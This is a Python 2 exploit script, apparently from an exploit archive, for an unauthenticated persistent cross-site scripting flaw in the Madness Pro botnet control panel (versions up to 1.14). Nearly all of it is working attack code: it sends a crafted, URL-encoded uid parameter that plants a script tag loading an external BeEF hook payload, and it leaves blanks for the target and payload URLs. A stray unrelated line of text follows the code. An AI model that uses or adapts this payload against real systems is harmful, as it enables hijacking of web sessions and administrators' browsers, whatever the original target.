#!/usr/bin/env python2 # -*- coding: utf-8 -*- # Exploit Title: Madness Pro <= 1.14 Persistent XSS # Date: June 05, 2014 # Exploit Author: @botnet_hunter # Version: 1.14 # Tested on: Apache2 - Ubuntu - MySQL #▄▄▌▄▄▄▄· ▄▄▄▄▄• ▌ ▄ ·.▄· ▄▌ #██•▪ ▐█ ▀█▪▪ •██▪ ·██ ▐███▪▐█▪██▌ #██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪ #▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·. #.▀▀▀▀█▄▀▪·▀▀▀▀▀█▄▀▪ ▀▀▀▀█▄▀▪▀▀█▪▀▀▀▀ • # ▄▄· ▄• ▄▌▄▄▄▪ ▐ ▄▄▄ • • ▌ ▄ ·.▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ · #▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀. #██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ #▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐███ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ #·▀▀▀▀▀▀ .▀▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀█▪▀▀▀ ▀▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀▀▀▀▀▀▀▀▀ # # Unauthenticated persistent XSS in Madness Pro panel <= 1.14 # Discovered and developed by bwall @botnet_hunter # # References: # http://blog.cylance.com/a-study-in-bots-lobotomy # import urllib # Fill in URL that Madness Pro bot connects back to panel_url = "" # Fill in URL to your Javascript payload (the shorter the better) beef_hook = "" def install_beef_hook(beef_hook_url, panel_index_url): f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E" "%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url, beef_hook_url)) print f.read() install_beef_hook(beef_hook, panel_url)
体验盒子
